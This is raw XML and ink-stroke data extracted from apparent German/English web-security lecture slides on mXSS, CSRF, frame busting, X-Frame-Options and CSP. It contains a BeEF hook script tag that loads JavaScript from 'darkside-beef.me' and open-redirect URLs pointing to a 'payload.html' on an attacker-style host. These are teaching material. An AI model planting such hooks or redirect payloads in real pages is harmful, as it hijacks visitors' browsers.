324,9-34-153,2-21-280,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0-1 1,-1 2-1,-9 12 87,11-15-89,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 1,-1 0-1,1 0 0,0 0 0,0-1 0,-1 1 1,1 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1-1-1,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,1-4 52,0-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,0-1 0,3-3 0,9-20 50,-5 3-109,1 1 1,1 0-1,1 0 0,1 1 0,0 1 0,2 1 1,1 0-1,1 0 0,0 2 0,2 0 1,0 1-1,1 1 0,0 1 0,39-23 1,-56 37 2,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,0 1 0,-1-1 0,8 0 0,-10 1-9,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1-1,0 1 1,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0-1,0 1 1,-1 3 0,0 0-1,0-1 0,0 1 1,-1 0-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 0-1,-1 0 1,0 0-1,0-1 0,-1 1 1,1-1-1,-1 0 0,1 0 1,-6 4-1,-11 8 0,-40 22 1,42-27-125,0-1 1,0-1 0,-39 13 0,6-15-2519,42-8 1950,7-8-4801,12-8-2656,-9 12 5109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8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 2100,'-20'-5'10020,"20"5"-9967,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 1,1-1-1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,18 6-823,-17-6 125,5 0 715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59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4839 8 440,'-11'-7'6973,"11"7"-6827,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,1-1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,4-4 3370,-4 5-3305,0 1-1,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,-2 1 0,-13 15 257,15-15-424,-1 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,0-1 0,0 1 0,-4 1-1,1-1 53,0 1 0,0-1-1,0 1 1,0 1 0,0-1-1,0 1 1,-6 6-1,-29 20 322,-89 43 590,45-19-347,-166 74 616,131-80-951,1 1 296,53-27-260,20-8-90,-67 17 609,43-13-509,-99 18 449,140-31-670,-33-1 338,48-4-320,0 1 0,0 0-1,-25 5 1,11-1-62,-1-1-1,1-1 1,-1-2-1,0-1 1,-28-3-1,-20 0-100,32 4 88,18 0 54,-1-1 1,-46-7-1,51 1-145,14 4 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0 1 0,-12 0 0,-118-6 0,93 4 0,33 1 0,0 0 0,0 1 0,0 0 0,-14 3 0,16-2 0,0 0 0,0-1 0,0 0 0,-19-3 0,-22-1 0,-57-8 0,-41-6 0,7 24 0,131-7 0,0-3 0,-23-6 0,-1 1 0,0 2 0,-1 2 0,-50-2 0,77 8 0,-19-7 0,1-2 0,16 4 0,-5 0 0,0 1 0,0 1 0,-27-1 0,15 1 0,9-2 0,-1 0 0,0 2 0,0 0 0,0 2 0,0 0 0,0 1 0,0 1 0,-21 4 0,-61 4 0,-81-4 0,119 0 0,-76 0 0,129-6 0,0-1 0,0-1 0,0 0 0,-21-7 0,21 6 0,-96-20 0,42 10 0,-21-8 0,66 8 0,17 10 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,-6-1 0,4 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-6-5 0,-36-22 0,-16-2 0,61 27 0,2 4 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,-1-1 0,-9-5 0,3 0 0,1 1 0,0-2 0,1 1 0,0-1 0,-8-11 0,11 12 0,-1 1 0,1-1 0,-1 1 0,0 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,-12-7 0,11 9 0,-3-7 0,6 5 0,0 0 0,-3 3 0,4-5 0,2 4 0,-2 3 0,3 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-2 0 0,-8-9 0,10 9 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-5-2 0,3-15 0,0 12 0,-5 5 0,-49-13-13379,54 11 12615,-1 1-1,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,-6 1 1,-5 0-1923,-17-1-1642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0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13 437 976,'-1'0'145,"1"0"1,-1 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 0,-1 1 1,1-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,0-1 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,1-2-1,-1 0 183,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 0,-1 0 1,1-1-1,0 1 1,0 0-1,0-1 1,-1 1-1,3-2 0,-1 2 366,-2-9 1113,1-9 3012,7 10-4336,-7 9-449,-1-1 0,1 0 1,-1 0-1,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,-1-2 0,0 2-3,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,0-2 0,0 1 9,0 0-1,1-1 0,-1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,-1-1-1,1 1 0,-1-1 1,0-3-1,8-27 199,-7 27-187,1 0 0,-1 0-1,0 0 1,-1-1 0,0 1 0,0 0-1,0 0 1,-2-11 0,1-7 204,11-7 247,-10 29-470,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0-1-1,1 1 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1-1,2-3 1,-2 2 27,0 0 1,0 0 0,-1 1-1,1-1 1,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1-2 1,0-6 285,1 10-204,2-29 1175,39 35-1115,8 5-70,0-3 0,0-1 0,1-3 0,62-4 0,-63 1-123,163-12 67,-190 9-76,-20 2-37,-1 1 0,1-1-1,0 1 1,-1 0 0,1 0-1,-1 0 1,1-1 0,0 1-1,-1 1 1,1-1 0,-1 0-1,1 0 1,0 1-1,-1-1 1,1 1 0,-1-1-1,3 2 1,-4-1-136,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1-1 1,1 1-1,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 1,-2 0-1,-18 17-5372,-2-6-2620,12-11 3772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3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32 48,'0'6'15243,"-9"0"-14026,10-6-1195,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1-1 0,-1 1-1,0 0 1,0-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,-1 0 262,25-16-189,-17 16-99,13-4-4,-18 4 8,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0-1,1 0 1,1 1 0,10-1 14,-8-1-15,0 1-1,-1 0 1,1 0 0,0 0 0,0 1 0,0 0-1,0 0 1,5 2 0,20 4 11,-30-7-12,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,2 1 1,5 7-42,-8-9 42,1 0 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1 7 11,-1 0 0,0 0 0,0 0 0,-1 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-6 8 0,-10 24 20,11-27-20,8-12-9,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,1 1 0,-1-1-1,1 1 1,0-1-1,-1 0 1,1 1-1,0 1 1,-11 59 42,11-56-39,1 0 0,0 0 1,0 1-1,1-1 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 0,1-1 1,1 1-1,-1-1 1,5 5-1,11 12-11,36 33 1,-36-38 68,-2 0 0,22 28 0,-36-42-15,-1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,-1 5 0,0-5-4,0-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-5 2 0,-15 3-20,0 0 0,0-1 0,-38 3 0,-10 2-327,67-10 173,0 0 0,-1 0-1,1-1 1,0 1 0,0-1 0,0 0 0,0 0-1,0 0 1,-6-3 0,8 3-297,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0-1,-1-2 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1236,'0'0'1844,"0"-7"-568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5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12 784,'2'-12'9712,"-1"12"-9518,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 1 1,1 1 0,9 52 699,-4-15-534,-4-30-254,0 0 0,-1 0 0,0 0 1,-1 1-1,-1 16 0,0-18-25,0 0 0,1 0 1,0 1-1,1-1 0,0 0 0,5 17 1,-5-21-50,0 1 1,0-1 0,0 0 0,-1 1-1,0-1 1,-1 11 0,1-12-20,-1 0-1,1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,2 5 0,-2-8-18,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 0 0,1 0 1,-2 2-1,2-2-99,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,-30-12-9488,21 2 6145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6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0 206 504,'1'-4'437,"0"-1"-1,1 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,1 0 1,0 0-1,-1 1 1,7-7 0,35-36 1881,-34 36-2074,0 0-1,0 1 1,1 0 0,1 1 0,0 0 0,0 1 0,0 0 0,1 1-1,0 0 1,0 1 0,0 0 0,1 2 0,-1-1 0,1 1 0,21-1-1,-32 5-197,1-1-1,-1 1 0,0-1 1,1 1-1,-1 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0 0 0,0-1 1,-1 1-1,1 0 0,0 1 1,-1-1-1,0 0 0,1 1 1,-1-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,-1-1 0,1 0 1,-1 1-1,0-1 0,0 0 1,0 1-1,0-1 1,-1 0-1,1 1 0,-1-1 1,-1 4-1,-6 11 426,4-8-232,0 0 0,-1 0 0,1-1 0,-2 0 0,0 0 0,-11 14 0,-16 15 400,27-29-504,-1-1-1,0-1 0,0 1 1,-9 6-1,-3 1 132,16-11-189,-1-1 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1-1 0,-1 0 0,-5 2 0,-5 0 289,-24 3 477,52-20-1856,-4 8-125,1 0-1,1 1 0,-1 0 0,1 1 1,-1 0-1,1 1 0,0 0 0,11 0 0,-7 0 388,11-2-1,-26 3 764,0 1 1,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,0 1 1,1-1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,0 0-1,1 1 1,-1-1 0,0 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 1-1,45 22 5063,-11-6-3190,-24-14-1540,-1 2 0,0-1 1,0 1-1,15 12 0,30 23 386,-39-26-646,-12-11-82,-1-1 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,1-1 0,-1 1 0,7 0 0,18 2 153,-20-2-3773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32 103 1332,'0'0'1432,"-9"5"1468,13-4-2583,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,1 0 0,-1 0 0,0-1 0,8-1 0,41-10 617,-46 11-718,0-1 0,0 1 0,0-2-1,0 1 1,-1-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,-1-1 0,7-7 0,-11 12-169,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,-4-5 471,5 5-490,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,-43 9 314,33-4-228,-1 1 1,1 0-1,1 1 1,-1 0-1,1 1 1,1 0-1,0 0 1,-15 19 0,22-25-94,1 1 1,-1-1 0,1 1 0,1-1 0,-1 1-1,0 0 1,1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1-1 0,2 5-1,-1-2 0,0-1-1,0 0 1,1 0 0,0 0-1,0 0 1,0-1-1,1 1 1,-1-1-1,1 0 1,0 0 0,1-1-1,-1 0 1,0 0-1,1 0 1,0 0-1,8 2 1,0-1-27,0 0 0,0-1-1,0 0 1,1-1 0,-1-1 0,16 0 0,-20-1-534,-1-1 0,1 0 0,0 0 1,0-1-1,16-5 0,-20 4-608,0 0 0,0-1 1,0 1-1,-1-1 0,0 0 0,1-1 0,-1 1 0,6-9 0,0 1-2101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 1092,'0'0'1578,"-19"-6"8693,20 7-10170,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 2-1,7 42 589,-2-10-551,-3-28-116,0 0 0,-1 1 0,0-1 0,0 0 0,-1 13 0,4 28 42,18 62 22,-1-8-69,-18-96-15,-1 1 1,0-1-1,0 1 1,-1 0-1,0 0 1,0 0-1,0 7 1,5-7-34,-3-3-65,-10-3 23,-8-26-1689,12 19 1536,-1 1 0,0 0 0,0-1 0,-1 1 1,1 1-1,-1-1 0,-8-5 0,3 2 161,6 4 37,-56-40 206,39 34 176,18 9-172,-1-1 0,1 1-1,0-1 1,0 0 0,0 0 0,0 0 0,0-1 0,-4-2-1,-4-5 1190,6 3-516,32 6-668,39 4-361,-4 0-3149,1-8-6106,-51 4 6281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lem.de/news/mxss-cross-site-scripting-in-der-google-suche-1904-140406.html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Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Zum Teil CSRF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9383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3149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5571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72429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Properties wie .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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> verändern (mutieren) das übergebene HTML um Fehler zu korrigieren (z.B. End-Tags einfügen)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Name kommt daher, weil erst durch die Veränderung (Mutation) der Eingabe durch den Browser, ein ausführbares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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> entsteht.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de-DE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Jeder Browser macht das ein bisschen anders und auch die XSS-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Filterlibraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> machen es unterschiedlich (oder gar nicht)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 =&gt; wenn es hier eine Differenz gibt, dann kann es sein, dass XSS-Filter es nicht bemerkt, Browser aber ausführt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de-DE" sz="180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0683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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> filter library used a template element to simulate the input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But according to HTML standard, within the template element JS is disabled, and when JS is disabled, the no-script tag is interpreted, so the browser fixes it and it seems benign.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But for real rendering JS is enabled and the HTML spec says, that no-script tags are just ignored, and the browser uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.golem.de/news/mxss-cross-site-scripting-in-der-google-suche-1904-140406.html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6970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lot of them were around 2017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0739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5563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9562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322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5502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Vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: darkside-beef.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hook-url: &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://darkside-beef.me:3000/hook.js"&gt;&lt;/script&gt;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08787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57567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50058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https://w3c.github.io/reporting/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT"/>
              <a:t>2 HTTP-Header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16854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except some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reeeeaaaly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> old browsers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9126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08957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1093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20038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85565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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>redirect.php?uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Luke&amp;color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>=http://darkside.me/payload.html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8042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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>redirect.php?uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Luke&amp;color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>=http://darkside.me/payload.html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94923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474875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00623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3409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5793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72622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50115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943522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79084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065849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31592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allow-from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>funktioniert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browser!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3048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857934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Clientseitiges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Frame Busting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empfehlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, da es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browserspezifisch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und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häufig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>umgangen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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>besten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r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X-Frame-Options und CSP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25473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304500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https://imgflip.com/memegenerator/Star-Wars-Yoda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4728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50616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6605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3438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6464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53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5.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png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33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink611.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink625.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink633.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink641.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink650.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink673.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" 